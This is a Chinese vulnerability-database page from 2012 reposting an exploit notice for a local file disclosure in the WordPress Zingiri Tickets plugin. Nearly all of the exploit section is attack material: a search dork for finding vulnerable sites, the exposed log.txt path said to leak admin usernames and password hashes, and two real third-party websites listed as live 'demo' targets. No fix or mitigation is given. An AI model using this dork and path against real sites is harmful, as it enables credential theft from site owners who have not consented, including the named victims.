WordPress Zingiri Tickets File Disclosure

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1047626 漏洞类型
发布时间 2012-04-17 更新时间 2012-04-17
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2012040136
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
##########################################################################
# Title : WordPress Plugin Zingiri Tickets                               #
# Author: MadLeeTs                                                      #
# Greets: Shadow008,1337,Invectus,pSyCh0_3D,KhanTastiC,MadBuGz,H4x0rL1f3  #
# Vendor: http://www.zingiri.com/plugins-and-addons/tickets/             #
# Email : h4x0rl1f3@gmail.com WwW.MadLeeTs.CoM
<http://www.madleets.com/>
#
# Date : 17/04/2012                                                      #
# Dork : "/wp-content/plugins/zingiri-tickets"                           #
# Category  : PHP [Local File Disclosure]                                #
# Tested on: [Windows 7, Linux Ubuntu]                                   #
##########################################################################
Exploit
This vulnerbility affects very high because it shows you Admin username
and password hashes.
[localhost]/[path]/wp-content/plugins/zingiri-tickets/log.txt
Demo 1
http://www.hms69.com/wp-content/plugins/zingiri-tickets/log.txt
Demo 2
http://www.ranahost.com/wp-content/plugins/zingiri-tickets/log.txt
Regards to www.cyberarmy.com.pk & www.c0d3rz.com
##########################################################################